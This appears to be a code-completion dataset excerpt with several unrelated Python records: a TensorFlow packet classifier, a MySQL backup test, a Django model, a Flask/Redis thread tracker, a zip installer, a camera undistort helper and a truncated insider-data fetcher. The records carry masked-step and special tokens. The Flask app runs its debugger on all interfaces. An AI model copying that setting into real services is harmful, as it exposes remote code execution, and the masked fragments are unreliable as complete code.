tf.Variable(tf.random_normal([\n n_nodes_hl3, n_classes])), 'bias': tf.Variable(tf.random_normal([\n n_classes]))}\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer[\n 'bias'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias']\n )\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias']\n )\n l3 = tf.nn.relu(l3)\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=\n prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x, y:\n batch_y})\n epoch_loss += c\n i += batch_size\n print('Epoch', epoch + 1, 'completed out of', hm_epochs,\n 'loss:', epoch_loss)\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)\n )\n result_array = np.append(result_array, result)\n return result_array\n\n\ntrain_neural_network(x)\n",
"step-5": "from convert_data2 import array_rule\nfrom convert_data2 import array_packet\nimport tensorflow as tf\nimport numpy as np\n\ntrain_x, train_y = array_packet()\nx_input, input_ip = array_rule()\n\nn_nodes_hl1 = 210\nn_nodes_hl2 = 210\nn_nodes_hl3 = 210\n\nn_classes = 2\nbatch_size = 500\nhm_epochs = 20\n\nx = tf.placeholder('float')\ny = tf.placeholder('float')\nz = tf.placeholder('float')\n\nhidden_1_layer = {'f_fum': n_nodes_hl1,\n 'weight': tf.Variable(tf.random_normal([train_x.shape[1], n_nodes_hl1])),\n 'bias': tf.Variable(tf.random_normal([n_nodes_hl1]))}\n\nhidden_2_layer = {'f_fum': n_nodes_hl2,\n 'weight': tf.Variable(tf.random_normal([n_nodes_hl1, n_nodes_hl2])),\n 'bias': tf.Variable(tf.random_normal([n_nodes_hl2]))}\n\nhidden_3_layer = {'f_fum': n_nodes_hl3,\n 'weight': tf.Variable(tf.random_normal([n_nodes_hl2, n_nodes_hl3])),\n 'bias': tf.Variable(tf.random_normal([n_nodes_hl3]))}\n\noutput_layer = {'f_fum': None,\n 'weight': tf.Variable(tf.random_normal([n_nodes_hl3, n_classes])),\n 'bias': tf.Variable(tf.random_normal([n_classes])), }\n\n\ndef neural_network_model(data):\n l1 = tf.add(tf.matmul(data, hidden_1_layer['weight']), hidden_1_layer['bias'])\n l1 = tf.nn.relu(l1)\n\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weight']), hidden_2_layer['bias'])\n l2 = tf.nn.relu(l2)\n\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weight']), hidden_3_layer['bias'])\n l3 = tf.nn.relu(l3)\n\n output = tf.matmul(l3, output_layer['weight']) + output_layer['bias']\n\n return output\n\n\ndef train_neural_network(x):\n prediction = neural_network_model(x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\n\n with tf.Session() as sess:\n sess.run(tf.initialize_all_variables())\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i = 0\n\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n\n _, c = sess.run([optimizer, cost], feed_dict={x: batch_x,\n y: batch_y})\n epoch_loss += c\n i += batch_size\n\n print('Epoch', epoch + 1, 'completed out of', hm_epochs, 'loss:', epoch_loss)\n\n result_array = np.array([])\n batch_x = np.array(x_input)\n print(batch_x)\n result = (sess.run(tf.argmax(prediction.eval(feed_dict={z: batch_x}), 1)))\n result_array = np.append(result_array, result)\n\n return result_array\n\ntrain_neural_network(x)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_get_latest_backup(raw_binlog_status):
instance = BinlogStatus(raw_binlog_status)
assert instance.get_latest_backup() == BinlogCopy(host='master1', name=
'mysqlbin005.bin', created_at=100504)
<|reserved_special_token_1|>
from twindb_backup.copy.binlog_copy import BinlogCopy
from twindb_backup.status.binlog_status import BinlogStatus
def test_get_latest_backup(raw_binlog_status):
instance = BinlogStatus(raw_binlog_status)
assert instance.get_latest_backup() == BinlogCopy(host='master1', name=
'mysqlbin005.bin', created_at=100504)
|
flexible
|
{
"blob_id": "0dc556336cee9e5f41c036c6fcf6da950216693c",
"index": 5910,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_get_latest_backup(raw_binlog_status):\n instance = BinlogStatus(raw_binlog_status)\n assert instance.get_latest_backup() == BinlogCopy(host='master1', name=\n 'mysqlbin005.bin', created_at=100504)\n",
"step-3": "from twindb_backup.copy.binlog_copy import BinlogCopy\nfrom twindb_backup.status.binlog_status import BinlogStatus\n\n\ndef test_get_latest_backup(raw_binlog_status):\n instance = BinlogStatus(raw_binlog_status)\n assert instance.get_latest_backup() == BinlogCopy(host='master1', name=\n 'mysqlbin005.bin', created_at=100504)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Appointment(models.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Appointment(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=12, null=False)
date = models.DateField(null=True)
time = models.TimeField(default='10:00')
presciption = models.TextField(max_length=100, default='Write here')
status = models.CharField(max_length=10, choices=STATUS_CHOICES,
default='Pending')
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
STATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')
class Appointment(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=12, null=False)
date = models.DateField(null=True)
time = models.TimeField(default='10:00')
presciption = models.TextField(max_length=100, default='Write here')
status = models.CharField(max_length=10, choices=STATUS_CHOICES,
default='Pending')
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
from django.db import models
STATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')
class Appointment(models.Model):
first_name = models.CharField(max_length=100)
last_name = models.CharField(max_length=100)
phone_number = models.CharField(max_length=12, null=False)
date = models.DateField(null=True)
time = models.TimeField(default='10:00')
presciption = models.TextField(max_length=100, default='Write here')
status = models.CharField(max_length=10, choices=STATUS_CHOICES,
default='Pending')
def __str__(self):
return self.first_name + self.last_name
<|reserved_special_token_1|>
from django.db import models
# Create your models here.
STATUS_CHOICES=(
('Pending','Pending'),
('Completed','Completed'))
class Appointment(models.Model):
first_name=models.CharField(max_length=100)
last_name=models.CharField(max_length=100)
phone_number=models.CharField(max_length=12,null=False)
date=models.DateField(null=True)
time=models.TimeField(default="10:00")
presciption = models.TextField(max_length=100,default="Write here")
status = models.CharField(max_length=10,choices=STATUS_CHOICES,default="Pending")
def __str__(self):
return self.first_name + self.last_name
|
flexible
|
{
"blob_id": "3343844bf49cb3f4d655613475e44a140ac3106d",
"index": 4505,
"step-1": "<mask token>\n\n\nclass Appointment(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-2": "<mask token>\n\n\nclass Appointment(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n phone_number = models.CharField(max_length=12, null=False)\n date = models.DateField(null=True)\n time = models.TimeField(default='10:00')\n presciption = models.TextField(max_length=100, default='Write here')\n status = models.CharField(max_length=10, choices=STATUS_CHOICES,\n default='Pending')\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-3": "<mask token>\nSTATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')\n\n\nclass Appointment(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n phone_number = models.CharField(max_length=12, null=False)\n date = models.DateField(null=True)\n time = models.TimeField(default='10:00')\n presciption = models.TextField(max_length=100, default='Write here')\n status = models.CharField(max_length=10, choices=STATUS_CHOICES,\n default='Pending')\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-4": "from django.db import models\nSTATUS_CHOICES = ('Pending', 'Pending'), ('Completed', 'Completed')\n\n\nclass Appointment(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n phone_number = models.CharField(max_length=12, null=False)\n date = models.DateField(null=True)\n time = models.TimeField(default='10:00')\n presciption = models.TextField(max_length=100, default='Write here')\n status = models.CharField(max_length=10, choices=STATUS_CHOICES,\n default='Pending')\n\n def __str__(self):\n return self.first_name + self.last_name\n",
"step-5": "from django.db import models\n\n# Create your models here.\n\nSTATUS_CHOICES=(\n ('Pending','Pending'),\n ('Completed','Completed'))\n\nclass Appointment(models.Model):\n first_name=models.CharField(max_length=100)\n last_name=models.CharField(max_length=100)\n phone_number=models.CharField(max_length=12,null=False)\n date=models.DateField(null=True)\n time=models.TimeField(default=\"10:00\")\n presciption = models.TextField(max_length=100,default=\"Write here\")\n status = models.CharField(max_length=10,choices=STATUS_CHOICES,default=\"Pending\")\n\n def __str__(self):\n return self.first_name + self.last_name ",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import os
import json
from threading import Thread
import time
from time import sleep
from flask import Flask, json, render_template, request
import redis
from collections import OrderedDict
import requests
from Queue import Queue
REGISTRAR_URL = 'http://cuteparty-registrar1.cfapps.io/update'
app = Flask(__name__)
port = int(os.getenv("PORT"))
vcap = json.loads(os.environ['VCAP_SERVICES'])
svc = vcap['rediscloud'][0]['credentials']
db = redis.StrictRedis(host=svc["hostname"], port=svc["port"], password=svc["password"],db=0)
application_name = json.loads(os.environ['VCAP_APPLICATION'])['application_name']
class Producer(Thread):
"""
Background thread for fetching instance info
"""
def __init__(self,queue):
"""
Constructor
"""
Thread.__init__(self)
self.queue = queue
def run(self):
"""
This is the run implementation of the background thread , which fetchs the instaces info.
"""
while True :
try:
instance_id = os.getenv("CF_INSTANCE_INDEX")
mydict = db.hgetall(application_name)
if instance_id not in mydict :
self.queue.put(instance_id)
except :
pass
finally:
pass
class Consumer(Thread):
"""
Backgrdound thread for fetching from Queue and updating redis
"""
def __init__(self,queue):
"""
Constrcutor
"""
Thread.__init__(self)
self.queue = queue
def run(self):
"""
Run method for background thread which updates redis
"""
while True :
try :
instance_id = self.queue.get()
db.hset(application_name,instance_id,1)
except:
pass
finally:
pass
class MasterUpdater(Thread):
"""
This background thread will update the aggregator/registrar app at provided url
"""
def __init__(self,db,appname):
"""
Constructor
"""
Thread.__init__(self)
self.db = db
self.appname = appname
def run(self):
"""
Run implementation of background thread which updates the aggregator
"""
while True :
try:
appinfo = self.db.hgetall(self.appname)
appinfo_str = json.dumps(appinfo)
data = {'applicationname':self.appname,'appinfo':appinfo_str}
response = requests.post(REGISTRAR_URL, data=data)
time.sleep(2)
except :
pass
def init_workers():
"""
This method is for starting all worker threads.
We are using three workers right now .
1. One for fetching latest instances info and adds to Queue
2. One for fetching from Queue and updating Redis
3. For updating the aggregator app , about this applications info.
All are deamon threads.
"""
party_queue = Queue()
p = Producer(party_queue)
p.daemon = True
c = Consumer(party_queue)
c.deamon= True
m = MasterUpdater(db,application_name)
m.deamon = True
p.start()
c.start()
m.start()
@app.route('/addthread')
def addthread():
"""
This endpoint is for adding threads to the application.
Loadbalancer decids to go for which instances and based on that thread is added to it.
"""
instance_id = os.getenv("CF_INSTANCE_INDEX")
print 'Instance Id ****************%s'%instance_id
thread_count = int(db.hget(application_name,instance_id))
thread_count+=1
print 'Threadcount ****************%s'%thread_count
result = db.hset(application_name,str(instance_id),str(thread_count))
print 'HSET result %s'%result
print db.hgetall(application_name)
return json.dumps({'message':'success'})
@app.route('/deletethread')
def deletethread():
"""
This endpoint is for deleting threads to the application.
Loadbalancer decids to go for which instances and based on that thread is deleted from it.
"""
instance_id = os.getenv("CF_INSTANCE_INDEX")
print 'Instance Id **************%s'%instance_id
thread_count = int(db.hget(application_name,instance_id))
thread_count-=1
db.hset(application_name,instance_id,thread_count)
return json.dumps({'message':'success'})
@app.route('/instances')
def instances():
"""
This will list out all the instances and threads per application.
An application can see only it's threads and instances.
"""
mydict = db.hgetall(application_name)
ordered = OrderedDict()
for key in sorted(mydict):
ordered.__setitem__(key,mydict.get(key))
mylist = []
return render_template('robots.html', mydict=ordered)
@app.route('/')
def index():
"""
Main entry point
"""
return render_template('index.html')
if __name__ == "__main__":
init_workers()
app.run(host='0.0.0.0', port=port, debug=True)
|
normal
|
{
"blob_id": "b976dab3c621bb929eb488fa7f4394666efec2ed",
"index": 4410,
"step-1": "import os\nimport json\nfrom threading import Thread\nimport time\nfrom time import sleep\nfrom flask import Flask, json, render_template, request\nimport redis\nfrom collections import OrderedDict\nimport requests\n\nfrom Queue import Queue\n\nREGISTRAR_URL = 'http://cuteparty-registrar1.cfapps.io/update'\n\napp = Flask(__name__)\nport = int(os.getenv(\"PORT\"))\nvcap = json.loads(os.environ['VCAP_SERVICES'])\nsvc = vcap['rediscloud'][0]['credentials']\n\ndb = redis.StrictRedis(host=svc[\"hostname\"], port=svc[\"port\"], password=svc[\"password\"],db=0)\n\napplication_name = json.loads(os.environ['VCAP_APPLICATION'])['application_name']\n\nclass Producer(Thread):\n \"\"\"\n Background thread for fetching instance info\n \"\"\"\n def __init__(self,queue):\n \"\"\"\n Constructor \n \"\"\"\n Thread.__init__(self)\n self.queue = queue \n def run(self):\n \"\"\"\n This is the run implementation of the background thread , which fetchs the instaces info.\n \"\"\"\n while True :\n try:\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\")\n mydict = db.hgetall(application_name)\n if instance_id not in mydict :\n self.queue.put(instance_id)\n except :\n pass\n finally:\n pass\nclass Consumer(Thread):\n \"\"\"\n Backgrdound thread for fetching from Queue and updating redis\n \"\"\"\n def __init__(self,queue):\n \"\"\"\n Constrcutor\n \"\"\"\n Thread.__init__(self)\n self.queue = queue\n \n def run(self):\n \"\"\"\n Run method for background thread which updates redis\n \"\"\"\n while True :\n try :\n instance_id = self.queue.get()\n db.hset(application_name,instance_id,1)\n except:\n pass\n finally:\n pass\n \nclass MasterUpdater(Thread):\n \"\"\"\n This background thread will update the aggregator/registrar app at provided url\n \"\"\"\n def __init__(self,db,appname):\n \"\"\"\n Constructor\n \"\"\"\n Thread.__init__(self)\n self.db = db\n self.appname = appname\n def run(self):\n \"\"\"\n Run implementation of background thread which updates the aggregator\n \"\"\"\n while True :\n try:\n appinfo = self.db.hgetall(self.appname)\n appinfo_str = json.dumps(appinfo)\n data = {'applicationname':self.appname,'appinfo':appinfo_str}\n response = requests.post(REGISTRAR_URL, data=data)\n time.sleep(2)\n except :\n pass\ndef init_workers():\n \"\"\"\n This method is for starting all worker threads.\n We are using three workers right now .\n 1. One for fetching latest instances info and adds to Queue\n 2. One for fetching from Queue and updating Redis\n 3. For updating the aggregator app , about this applications info.\n All are deamon threads.\n \"\"\"\n party_queue = Queue()\n p = Producer(party_queue)\n p.daemon = True\n c = Consumer(party_queue)\n c.deamon= True\n m = MasterUpdater(db,application_name)\n m.deamon = True\n p.start()\n c.start()\n m.start()\n \n\n@app.route('/addthread')\ndef addthread():\n \"\"\"\n This endpoint is for adding threads to the application.\n Loadbalancer decids to go for which instances and based on that thread is added to it. \n \"\"\"\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\")\n print 'Instance Id ****************%s'%instance_id\n thread_count = int(db.hget(application_name,instance_id))\n thread_count+=1\n print 'Threadcount ****************%s'%thread_count\n result = db.hset(application_name,str(instance_id),str(thread_count))\n print 'HSET result %s'%result\n print db.hgetall(application_name)\n return json.dumps({'message':'success'})\n@app.route('/deletethread')\ndef deletethread():\n \"\"\"\n This endpoint is for deleting threads to the application.\n Loadbalancer decids to go for which instances and based on that thread is deleted from it. \n \"\"\"\n instance_id = os.getenv(\"CF_INSTANCE_INDEX\") \n print 'Instance Id **************%s'%instance_id\n thread_count = int(db.hget(application_name,instance_id))\n thread_count-=1\n db.hset(application_name,instance_id,thread_count)\n \n return json.dumps({'message':'success'})\n\n\n@app.route('/instances')\ndef instances():\n \"\"\"\n This will list out all the instances and threads per application.\n An application can see only it's threads and instances. \n \"\"\"\n mydict = db.hgetall(application_name)\n ordered = OrderedDict()\n for key in sorted(mydict):\n ordered.__setitem__(key,mydict.get(key))\n mylist = []\n return render_template('robots.html', mydict=ordered)\n\n\n@app.route('/')\ndef index():\n \"\"\"\n Main entry point\n \"\"\"\n return render_template('index.html')\n\nif __name__ == \"__main__\":\n init_workers()\n app.run(host='0.0.0.0', port=port, debug=True)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import os
import sys
import winreg
import zipfile
class RwpInstaller:
railworks_path = None
def extract(self, target):
with zipfile.ZipFile(target) as z:
if z.testzip():
return self.output('Corrupt file {}\n'.format(target))
self.output('{} file valid\n\n'.format(target))
extracted = 0
to_be_extracted = len(z.infolist())
for file in z.infolist():
extracted_path = z.extract(file, self.railworks_path).replace(
self.railworks_path, '')
extracted += 1
percent_complete = extracted / to_be_extracted
self.output('[{}/{} {}] {}\r'.format(extracted,
to_be_extracted, (round(percent_complete * 10) * '*').
ljust(10), extracted_path[-55:]))
self.output('\n\n{} extracted successfully'.format(os.path.
basename(target)))
def get_railworks_path(self):
steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
'Software\\Valve\\Steam')
steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]
return os.path.join(steam_path, 'steamApps', 'common', 'railworks')
def output(self, out, wait=False):
if wait:
input(out)
else:
sys.stdout.write(out)
def main(self):
targets = sys.argv[1:]
if not targets:
return self.output('No RWP files passed.', wait=True)
self.railworks_path = self.get_railworks_path()
for target in targets:
self.extract(target)
self.output('\n\nAll done. Thanks for using RWP Installer.', wait=True)
if __name__ == '__main__':
RwpInstaller().main()
|
normal
|
{
"blob_id": "9c751dece67ef33ba8e5cb8281f024d2143e0808",
"index": 8811,
"step-1": "<mask token>\n\n\nclass RwpInstaller:\n <mask token>\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass RwpInstaller:\n railworks_path = None\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n\n def main(self):\n targets = sys.argv[1:]\n if not targets:\n return self.output('No RWP files passed.', wait=True)\n self.railworks_path = self.get_railworks_path()\n for target in targets:\n self.extract(target)\n self.output('\\n\\nAll done. Thanks for using RWP Installer.', wait=True)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass RwpInstaller:\n railworks_path = None\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n\n def main(self):\n targets = sys.argv[1:]\n if not targets:\n return self.output('No RWP files passed.', wait=True)\n self.railworks_path = self.get_railworks_path()\n for target in targets:\n self.extract(target)\n self.output('\\n\\nAll done. Thanks for using RWP Installer.', wait=True)\n\n\nif __name__ == '__main__':\n RwpInstaller().main()\n",
"step-4": "import os\nimport sys\nimport winreg\nimport zipfile\n\n\nclass RwpInstaller:\n railworks_path = None\n\n def extract(self, target):\n with zipfile.ZipFile(target) as z:\n if z.testzip():\n return self.output('Corrupt file {}\\n'.format(target))\n self.output('{} file valid\\n\\n'.format(target))\n extracted = 0\n to_be_extracted = len(z.infolist())\n for file in z.infolist():\n extracted_path = z.extract(file, self.railworks_path).replace(\n self.railworks_path, '')\n extracted += 1\n percent_complete = extracted / to_be_extracted\n self.output('[{}/{} {}] {}\\r'.format(extracted,\n to_be_extracted, (round(percent_complete * 10) * '*').\n ljust(10), extracted_path[-55:]))\n self.output('\\n\\n{} extracted successfully'.format(os.path.\n basename(target)))\n\n def get_railworks_path(self):\n steam_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER,\n 'Software\\\\Valve\\\\Steam')\n steam_path = winreg.QueryValueEx(steam_key, 'SteamPath')[0]\n return os.path.join(steam_path, 'steamApps', 'common', 'railworks')\n\n def output(self, out, wait=False):\n if wait:\n input(out)\n else:\n sys.stdout.write(out)\n\n def main(self):\n targets = sys.argv[1:]\n if not targets:\n return self.output('No RWP files passed.', wait=True)\n self.railworks_path = self.get_railworks_path()\n for target in targets:\n self.extract(target)\n self.output('\\n\\nAll done. Thanks for using RWP Installer.', wait=True)\n\n\nif __name__ == '__main__':\n RwpInstaller().main()\n",
"step-5": null,
"step-ids": [
4,
6,
7,
8
]
}
|
[
4,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def undistort_img(img):
"""
Return an undistorted image given previous calibrated parameters
References from OpenCV docs
"""
ret = load_camera_ret()
K = load_K()
dist = load_camera_dist()
h, w = img.shape[:2]
new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),
1, (w, h))
img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)
return img_undistorted
<|reserved_special_token_1|>
import numpy as np
import cv2
from camera import load_K, load_camera_dist, load_camera_ret
def undistort_img(img):
"""
Return an undistorted image given previous calibrated parameters
References from OpenCV docs
"""
ret = load_camera_ret()
K = load_K()
dist = load_camera_dist()
h, w = img.shape[:2]
new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),
1, (w, h))
img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)
return img_undistorted
<|reserved_special_token_1|>
import numpy as np
import cv2
from camera import load_K, load_camera_dist, load_camera_ret
def undistort_img(img):
'''
Return an undistorted image given previous calibrated parameters
References from OpenCV docs
'''
ret = load_camera_ret()
K = load_K()
dist = load_camera_dist()
h,w = img.shape[:2]
new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h))
img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)
return img_undistorted
|
flexible
|
{
"blob_id": "844c630d3fe2dda833064556228b524608cfece9",
"index": 4671,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n",
"step-3": "import numpy as np\nimport cv2\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\n\ndef undistort_img(img):\n \"\"\"\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n \"\"\"\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h, w = img.shape[:2]\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K, dist, (w, h),\n 1, (w, h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n return img_undistorted\n",
"step-4": "import numpy as np\nimport cv2\n\nfrom camera import load_K, load_camera_dist, load_camera_ret\n\ndef undistort_img(img):\n '''\n Return an undistorted image given previous calibrated parameters \n References from OpenCV docs\n '''\n ret = load_camera_ret()\n K = load_K()\n dist = load_camera_dist()\n h,w = img.shape[:2]\n\n new_camera_matrix, roi = cv2.getOptimalNewCameraMatrix(K,dist,(w,h),1,(w,h))\n img_undistorted = cv2.undistort(img, K, dist, None, new_camera_matrix)\n\n return img_undistorted\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
self.finance_db = FinanceDB('stock_insider')
incomplete = self.get_incomplete_insider_tasks()
insider_transactions = InsiderTransactions(incomplete, batching
=True)
for insider_data in insider_transactions.generate():
documents = []
for symbol, data in insider_data.items():
if data:
data['trading_date'] = str(self.trading_date.date())
data['symbol'] = symbol
documents.append(data)
self.found += 1
else:
self.not_found += 1
if documents:
self.finance_db.insert_many(documents)
self._log('{}/{} found/not_found'.format(self.found, self.
not_found))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FintelInsiderAcquisition:
def __init__(self, trading_date=None):
self.task_name = 'FintelInsiderAcquisition'
self.trading_date = trading_date
self.symbols = Financial_Symbols.get_all()
self.finance_db = None
self._reset_counters()
def _reset_counters(self):
self.found = 0
self.not_found = 0
self.symbols = Financial_Symbols.get_all()
<|reserved_special_token_0|>
def get_incomplete_insider_tasks(self):
if not self.finance_db or not self.trading_date:
return []
found = set(list(map(lambda x: x['symbol'], self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(set(self.symbols) - found)
def get_complete_insider_tasks(self):
symbols = []
if not self.finance_db or not self.trading_date:
return symbols
found = set(map(lambda x: x['symbol'], list(self.finance_db.find({
'trading_date': str(self.trading_date.date())}, {'symbol': 1}))))
return list(found)
def start(self):
self._reset_counters()
if self.trading_date.weekday() > 4:
self._log('Not running {} on weekend'.format(self.task_name))
elif self.trading_date.weekday() <= 4 and self.trading_date.hour < 16:
self._log('Trading day has not finished yet, {}'.format(self.
trading_date.time()))
else:
